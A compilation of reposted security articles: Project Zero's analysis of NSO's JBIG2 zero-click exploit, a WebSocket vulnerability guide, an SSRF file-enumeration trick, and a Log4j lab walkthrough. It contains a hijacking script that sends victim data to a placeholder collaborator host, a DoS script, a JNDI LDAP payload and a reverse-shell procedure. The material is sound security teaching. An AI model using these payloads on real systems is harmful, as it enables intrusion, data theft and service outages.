Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent." Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out. From One to Zero In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages: Screenshots of Phishing SMSs reported to Citizen Lab in 2016 source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense. One weird trick The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username. iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. 
You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif: [IMGIFUtils copyGifFromPath:toDestinationPath:error] Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file. The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code. Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor. A PDF in your GIF NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser. PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. 
The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white. It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2 for its scan-to-pdf functionality source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page, in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar looking regions together.
The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them: Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations. There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore. Technique 2: Refinement coding As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode. It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. 
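The refinement idea boils down to bitwise operations on bitmaps, which is easy to demonstrate. Here is a small illustrative Python sketch (my own, with glyph rows packed as integers; not the JBIG2 wire format): the encoder stores the XOR difference mask, and the decoder XORs it back onto the substituted glyph to recover the original pixels.

```python
# Glyph rows as 5-bit integers (1 = black pixel, 0 = white).
substituted = [0b01110, 0b10001, 0b11111, 0b10001, 0b10001]  # reference glyph
original    = [0b01110, 0b10001, 0b11111, 0b10001, 0b11011]  # slightly different scan

# Encoder: the difference mask is the row-wise XOR of the two bitmaps.
mask = [s ^ o for s, o in zip(substituted, original)]

# Decoder: XORing the mask onto the substituted glyph restores the original.
restored = [s ^ m for s, m in zip(substituted, mask)]
assert restored == original

print([f"{m:05b}" for m in mask])  # only the last row differs
```

Because XOR is its own inverse, storing only the (usually very sparse, hence highly compressible) mask is enough for lossless reconstruction.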
Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle: Using the XOR operator on bitmaps to compute a difference image In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression. Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas. A JBIG2 stream Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available. The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page. Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict. A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas. A JBIG2SymbolDict groups JBIG2Bitmaps together. 
The destination page is represented as a JBIG2Bitmap, as are individual glyphs. JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number, the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

    Guint numSyms; // (1)

    numSyms = 0;
    for (i = 0; i < nRefSegs; ++i) {
      if ((seg = findSegment(refSegs[i]))) {
        if (seg->getType() == jbig2SegSymbolDict) {
          numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
        } else if (seg->getType() == jbig2SegCodeTable) {
          codeTables->append(seg);
        }
      } else {
        error(errSyntaxError, getPos(),
              "Invalid segment reference in JBIG2 text region");
        delete codeTables;
        return;
      }
    }
    ...
    // get the symbol bitmaps
    syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

    kk = 0;
    for (i = 0; i < nRefSegs; ++i) {
      if ((seg = findSegment(refSegs[i]))) {
        if (seg->getType() == jbig2SegSymbolDict) {
          symbolDict = (JBIG2SymbolDict *)seg;
          for (k = 0; k < symbolDict->getSize(); ++k) {
            syms[kk++] = symbolDict->getBitmap(k); // (4)
          }
        }
      }
    }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value. That smaller value is used for the heap allocation size at (3), meaning syms points to an undersized buffer. Inside the inner-most loop at (4), JBIG2Bitmap pointer values are written into the undersized syms buffer. Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegment routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers.
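The wraparound at (2) is plain modular arithmetic. A hedged Python sketch (my own model, not the Xpdf code) of just the size computation shows how summing attacker-chosen symbol-dictionary sizes in a 32-bit unsigned integer yields a tiny allocation while the copy loop still iterates over the full, un-wrapped total:

```python
MASK32 = 0xFFFFFFFF  # Guint arithmetic wraps at 2**32

def num_syms(symbol_dict_sizes):
    # Mirrors the accumulation at (2) with 32-bit wraparound.
    n = 0
    for size in symbol_dict_sizes:
        n = (n + size) & MASK32
    return n

# Hypothetical reference-segment sizes that sum just past 2**32:
sizes = [0x80000000, 0x80000020]
print(hex(num_syms(sizes)))  # allocation at (3) is sized for only 0x20 pointers
print(hex(sum(sizes)))       # but the copy loop at (4) iterates 0x100000020 times
```

Whether such sizes are actually reachable depends on how the referenced symbol dictionaries are crafted; the sketch only illustrates the arithmetic gap between the allocation size and the copy count.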
The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4). Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls), but the returned type will now not be equal to jbig2SegSymbolDict, thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to which current drawing commands render). JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer's width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian, the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer), and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer: a fairly random value depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.
This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer. The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields: The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer. At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser? My other compression format is turing-complete! As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. 
By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect. In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets: The memory layout showing how logical operators can be applied out-of-bounds It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits? You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory. With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate: An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND. A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function. Practical circuits JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. 
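The universality claim above is easy to verify mechanically. Here is a short Python sketch (my own illustration, modelling each available refinement combination operator as a one-bit function) that builds NOT and NAND exactly as described, then rebuilds OR from NAND alone:

```python
# The four combination operators JBIG2 refinement exposes, as 1-bit functions:
AND  = lambda a, b: a & b
OR   = lambda a, b: a | b
XOR  = lambda a, b: a ^ b
XNOR = lambda a, b: (a ^ b) ^ 1

# NOT is XOR with the constant 1; NAND is AND followed by NOT.
NOT  = lambda a: XOR(a, 1)
NAND = lambda a, b: NOT(AND(a, b))

# Since NAND is universal, every other gate can be rebuilt from it, e.g. OR:
def or_from_nand(a, b):
    return NAND(NAND(a, a), NAND(b, b))

for a in (0, 1):
    for b in (0, 1):
        assert NAND(a, b) == (0 if (a and b) else 1)
        assert or_from_nand(a, b) == (a | b)
print("NAND built from the refinement operators is universal")
```

The exploit's "CPU" applies exactly this idea, only with each gate realized as a refinement step over bits of the unbounded page bitmap rather than Python lambdas.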
Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent. The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying. In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox. Sursa: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
-
Websocket: common vulnerabilities plaguing it and managing them.

Published by Surendiran S at December 17, 2021

What is WebSocket?

- Efficient two-way communication protocol
- WebSocket is stateful where HTTP is stateless
- Two main parts: handshake and data transfer

WebSockets allow the client/server to create a bidirectional communication channel. The client and server then communicate asynchronously, and messages can be sent in either direction. WebSockets are particularly useful in situations where low latency or server-initiated messages are required, such as real-time data feeds, online chat applications, message boards, web interfaces, and commercial applications.

The format of a WebSocket URL:

- ws://redacted.com is used for an unencrypted connection
- wss://redacted.com is used for a secure SSL connection

The browser and server perform a WebSocket handshake using HTTP to connect. The browser issues a WebSocket handshake request, and if the server accepts the connection, it returns a WebSocket handshake response. After the response, the network connection remains open and can be used to send WebSocket messages in both directions.

Using the shodan.io search engine, it is possible to find WebSocket applications on the Internet. Search query: Sec-WebSocket-Version

Vulnerabilities in WebSocket

Some vulnerabilities that occur in WebSocket applications:

- Cross-site WebSocket hijacking
- Unencrypted communication
- Denial of service
- Input validation vulnerabilities, etc.

Cross-Site WebSocket Hijacking:

Cross-site WebSocket hijacking is also known as cross-origin WebSocket hijacking. It is possible when the server relies only on session authentication data (cookies) to perform an authenticated action and the origin is not properly checked by the application. When users open the attacker-controlled site, a WebSocket is established in the context of the user's session.
Attackers can connect to the vulnerable application using the attacker-controlled domain. Then the attacker can communicate with the server via WebSockets without the victim's knowledge. Attackers can then communicate with the application through the WebSocket connection and also access the server's responses. A common script that can be used for exploitation of this vulnerability can be found below:

    <script>
        var ws = new WebSocket('wss://redacted.com');
        ws.onopen = function() {
            ws.send("READY");
        };
        ws.onmessage = function(event) {
            fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
        };
    </script>

An attacker can observe the exfiltrated data in the HTTP interaction's request body.

Unencrypted Communications:

WS is a plain-text protocol just like HTTP. The information is transferred through an unencrypted TCP channel, and an attacker can capture and modify the traffic over the network.

Denial of Service:

WebSockets allow unlimited connections by default, which leads to DoS. This affects the ws package, versions <1.1.5, >=2.0.0 <3.3. The following script can be used to perform DoS attacks on vulnerable applications:

    const WebSocket = require('ws');
    const net = require('net');

    const wss = new WebSocket.Server({ port: 3000 }, function () {
        const payload = 'constructor'; // or ',;constructor'

        const request = [
            'GET / HTTP/1.1',
            'Connection: Upgrade',
            'Sec-WebSocket-Key: test',
            'Sec-WebSocket-Version: 8',
            `Sec-WebSocket-Extensions: ${payload}`,
            'Upgrade: websocket',
            '\r\n'
        ].join('\r\n');

        const socket = net.connect(3000, function () {
            socket.resume();
            socket.write(request);
        });
    });

Input Validation Vulnerabilities:

Injection attacks occur when an attacker passes malicious input via WebSockets to the application. Some possible kinds of attacks are XSS, SQL injection, code injection, etc.

Example: Let's say the application uses WebSockets and the attacker passes a malicious input in the UI of the application.
In this case, the input is HTML-encoded by the client before sending it to the server, but the attacker can intercept the request with a web proxy and modify the input with a malicious payload. Observe that the input passed by the attacker is executed by the application.

Mitigation:

It is recommended to follow these protective measures when implementing WebSockets:

- Use an encrypted (TLS) WebSocket connection. The URI scheme for it is wss://
- Check the 'Origin' header of the request. This header was designed to protect against cross-origin attacks. If the 'Origin' is not trusted, simply reject the request.
- Use session-based individual random tokens (just like CSRF tokens). Generate them server-side, place them in hidden fields on the client side, and verify them on each request.
- Validate input messages against the data model in both directions.
- Output-encode messages when they are embedded in the web application.

Conclusion

WebSocket is a bidirectional communication protocol over a single TCP connection. WebSockets help handle high-scale data transfers between servers and clients. But one has to be careful while using WebSockets, as they have vulnerabilities like cross-site WebSocket hijacking, unencrypted communication, denial of service, etc.

References:
https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh
https://cobalt.io/blog/a-pentesters-guide-to-websocket-pentesting
https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc
https://portswigger.net/web-security/websockets
https://www.vaadata.com/blog/websockets-security-attacks-risks

Surendiran S

An intern security consultant at SecureLayer7, Surendiran always brings some unique ideas to the table. With him having just peeped into security consulting and analysis, he is currently exploring the world of cybersecurity and expanding his scope.

Sursa: https://blog.securelayer7.net/websocket-common-vulnerabilities-plaguing-it-and-managing-them/
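To make the Origin-check mitigation from the post above concrete, here is a minimal Python sketch (my own illustration; the header dicts and the ALLOWED_ORIGINS allow-list are hypothetical, not from the post) of the decision a server should make during the WebSocket handshake:

```python
ALLOWED_ORIGINS = {"https://app.example.com"}  # illustrative allow-list

def origin_allowed(handshake_headers: dict) -> bool:
    # Reject the upgrade unless the browser-supplied Origin is trusted;
    # this is the core defence against cross-site WebSocket hijacking.
    origin = handshake_headers.get("Origin", "")
    return origin in ALLOWED_ORIGINS

# Simulated handshake headers: one from an attacker page, one legitimate.
evil = {"Upgrade": "websocket", "Origin": "https://evil.example.net"}
good = {"Upgrade": "websocket", "Origin": "https://app.example.com"}

print(origin_allowed(evil))   # False: the handshake should be refused
print(origin_allowed(good))   # True
```

Note that the Origin check alone stops only browser-based cross-site attacks; per the mitigation list, it should be combined with per-session random tokens, since non-browser clients can set any Origin they like.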
-
-
Enumerating Files Using Server Side Request Forgery and the request Module

Written by Adam Baldwin with ♥ on 15 December 2017 in 2 min

If you ever find Server Side Request Forgery (SSRF) in a node.js based application and the app is using the request module, you can use a special url format to detect the existence of files / directories. While request does not support the file:// scheme, it does support a special url format to communicate with unix domain sockets, and the errors returned from a file existing vs not existing are different. The format looks like this:

    http://unix:SOCKET:PATH

and for our purposes we can ignore PATH altogether. Let's take this code for example. We're assuming that as a user we can somehow control the url.

File exists condition:

    const Request = require('request')

    Request.get('http://unix:/etc/passwd', (err) => {
        console.log(err)
    })

As /etc/passwd exists, request will try to use it as a unix socket; of course it is not a unix socket, so it will give a connection failure error.

    { Error: connect ENOTSOCK /etc/passwd
        at Object._errnoException (util.js:1024:11)
        at _exceptionWithHostPort (util.js:1046:20)
        at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
      code: 'ENOTSOCK',
      errno: 'ENOTSOCK',
      syscall: 'connect',
      address: '/etc/passwd' }

File does not exist condition:

Using the same code with a different file that does not exist:

    const Request = require('request')

    Request.get('http://unix:/does/not/exist', (err) => {
        console.log(err)
    })

The resulting error looks like this.
    { Error: connect ENOENT /does/not/exist
        at Object._errnoException (util.js:1024:11)
        at _exceptionWithHostPort (util.js:1046:20)
        at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
      code: 'ENOENT',
      errno: 'ENOENT',
      syscall: 'connect',
      address: '/does/not/exist' }

The difference is small: ENOTSOCK vs ENOENT. While not that severe an issue on its own, it's a trick that has helped me on past security assessments to enumerate file path locations. Maybe you'll find it useful too.

Originally posted on Medium

Author: Adam Baldwin

Sursa: https://evilpacket.net/2017/enumerating-files-using-server-side-request-forgery-and-the-request-module/
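The same errno oracle can be reproduced outside node. A hedged Python sketch (my own addition, Unix-only): connecting an AF_UNIX socket to a missing path fails with ENOENT, while an existing non-socket file fails with a different errno (ECONNREFUSED or ENOTSOCK, depending on platform and stack), so the error code alone reveals whether the file exists.

```python
import errno
import socket

def probe(path: str) -> str:
    # Distinguish "missing" from "exists" purely from the connect() errno,
    # mirroring the request module's http://unix:PATH trick above.
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.connect(path)
        return "exists (listening socket)"
    except OSError as e:
        if e.errno == errno.ENOENT:
            return "does not exist"
        return "exists ({})".format(errno.errorcode.get(e.errno, str(e.errno)))
    finally:
        s.close()

print(probe("/etc/passwd"))    # exists (exact errno varies by platform)
print(probe("/no/such/file"))  # does not exist
```

The point is the same as in the node case: the probe never reads the file's contents, yet the error channel still leaks its existence.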
-
A Detailed Guide on Log4J Penetration Testing December 18, 2021 By Raj Chandel In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the java logging package, Log4J. This vulnerability has a severity score of 10.0, most critical designation and offers remote code execution on hosts engaging with software that uses log4j utility. This attack has also been called “Log4Shell”. Table of Content Log4jShell What is log4j What is LDAP and JNDI LDAP and JNDI Chemistry Log4j JNDI lookup Normal Log4j scenario Exploit Log4j scenario Pentest Lab Setup Exploiting Log4j (CVE-2021-44228) Mitigation Log4jshell CVE-2021-44228 Description: Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Vulnerability Type Remote Code Execution Severity Critical Base CVSS Score 10.0 Versions Affected All versions from 2.0-beta9 to 2.14.1 CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments. 
Vulnerability Type Remote Code Execution Severity Critical Base CVSS Score 9.0 Versions Affected All versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 CVE-2021-45105 Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack. Vulnerability Type Denial of Service Severity High Base CVSS Score 7.5 Versions Affected All versions from 2.0-beta9 to 2.16.0 What is Log4J. Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet. What is LDAP and JNDI LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol that is used for directory service authentication. It provides the communication language that the application uses to communicate with other directory services. Directory services store lots of important information like, user accounts details, passwords, computer accounts, etc which are shared with other devices on the network. JNDI (Java Naming and Directory Interface) is an application programming interface (API) that provides naming and directory functionality to applications written using Java Programming Language. JNDI and LDAP Chemistry JNDI provides a standard API for interacting with name and directory services using a service provider interface (SPI). JNDI provides Java applications and objects with a powerful and transparent interface to access directory services like LDAP. The table below shows the common LDAP and JNDI equivalent operations. 
Log4j JNDI Lookup

Lookups are a mechanism that adds values to the log4j configuration at arbitrary places. Log4j has the ability to perform multiple lookups, such as map, system properties, and JNDI (Java Naming and Directory Interface) lookups. Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP, COS (Common Object Services), the Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc. If this functionality is implemented, we should see a line of code like this somewhere in the program:

${jndi:logging/context-name}

A Normal Log4j Scenario

The above diagram shows a normal log4j scenario.

Exploit Log4j Scenario

An attacker who can control log messages or log message parameters can execute arbitrary code on the vulnerable server, loaded from LDAP servers, when message lookup substitution is enabled. As a result, an attacker can craft a special request that makes the utility remotely download and execute the payload. Below is the most common example of it, using the combination of JNDI and LDAP:

${jndi:ldap://<host>:<port>/<payload>}

- The attacker inserts the JNDI lookup in a header field that is likely to be logged.
- The string is passed to log4j for logging.
- Log4j interpolates the string and queries the malicious LDAP server.
- The LDAP server responds with directory information that contains the malicious Java class.
- Java deserializes (or downloads) the malicious Java class and executes it.

Pentest Lab Setup

In the lab setup, we will use a Kali VM as the attacker machine and an Ubuntu VM as the target machine. So let's prepare the Ubuntu machine:

git clone https://github.com/kozmer/log4j-shell-poc.git

Once the git clone command has completed, browse to the log4j-shell-poc directory. Once inside that directory, we can execute the docker build command:

cd log4j-shell-poc
docker build -t log4j-shell-poc .
After that, run the second command from the GitHub page:

docker run --network host log4j-shell-poc

These commands let us use the Dockerfile with a vulnerable app. Once completed, we have our vulnerable webapp server ready. Now let's browse to the target IP address in our Kali browser at port 8080. This is the vulnerable docker application, and the area affected by this vulnerability is the username field. It is here that we are going to inject our payload. So now the lab setup is done: we have our vulnerable target machine up and running. Time to perform the attack.

Exploiting Log4j (CVE-2021-44228)

On the Kali machine, we need to git clone the same repository, so type the following command:

git clone https://github.com/kozmer/log4j-shell-poc.git

Now we need to install the JDK. It can be downloaded at the following link: https://mirrors.huaweicloud.com/java/jdk/8u202-b08/. Click on the correct version and download it inside Kali Linux. Now go to the download folder, extract the archive, and move the extracted directory to the /usr/bin folder:

tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin
cd /usr/bin

Once verified, let's exit this directory and browse to the log4j-shell-poc directory. That folder contains a Python script, poc.py, which we are going to configure as per our lab setup settings. Here you need to modify './jdk1.8.2.20/' to '/usr/bin/jdk1.8.0_202/' as highlighted. What we have done here is change the path of the Java location and the Java version in the script. Now that all changes have been made, we need to save the file and get ready to start the attack.

On the attacker machine, that is, Kali Linux, we will access the vulnerable docker webapp inside a browser by typing the IP of the Ubuntu machine followed by :8080. Now let's initiate a netcat listener and start the attack.
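Before launching it, it helps to see what the injected login request will actually carry. Here is a small illustrative Python sketch; the form field names ("uname", "password") are assumptions for illustration, not verified against the demo app's source.

```python
# Sketch: how a JNDI lookup string is delivered through a login form.
# The field names ("uname", "password") are illustrative assumptions;
# check the target app for the real ones.
from urllib.parse import urlencode

def build_login_body(attacker_ip: str, ldap_port: int = 1389) -> str:
    """Build a URL-encoded POST body carrying the lookup string."""
    payload = "${jndi:ldap://%s:%d/a}" % (attacker_ip, ldap_port)
    return urlencode({"uname": payload, "password": "anything"})

body = build_login_body("192.168.29.163")
print(body)  # the lookup string arrives percent-encoded in the POST body
```

The server decodes the body before logging the username, so log4j still sees the raw `${jndi:...}` string and performs the lookup.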
Type the following command in a terminal (make sure you are in the log4j-shell-poc directory when executing it):

python3 poc.py --userip 192.168.29.163 --webport 8000 --lport 9001

This script starts the malicious local LDAP server. Now copy the complete command shown after "send me:":

${jndi:ldap://192.168.29.163:1389/a}

Paste it inside the browser, in the username field. This will be our payload. In the password field, you can provide anything. Click on the login button to execute the payload, then switch to the netcat window, where we should get a reverse shell. We are finally inside the vulnerable webapp docker image.

Mitigation

CVE-2021-44228: Fixed in Log4j 2.15.0 (Java 8)

Implement one of the following mitigation techniques:
- Java 8 (or later) users should upgrade to release 2.16.0.
- Java 7 users should upgrade to release 2.12.2.
- Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 8)

Implement one of the following mitigation techniques:
- Java 8 (or later) users should upgrade to release 2.16.0.
- Java 7 users should upgrade to release 2.12.2.
- Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

CVE-2021-45105: Fixed in Log4j 2.17.0 (Java 8)

Implement one of the following mitigation techniques:
- Java 8 (or later) users should upgrade to release 2.17.0.
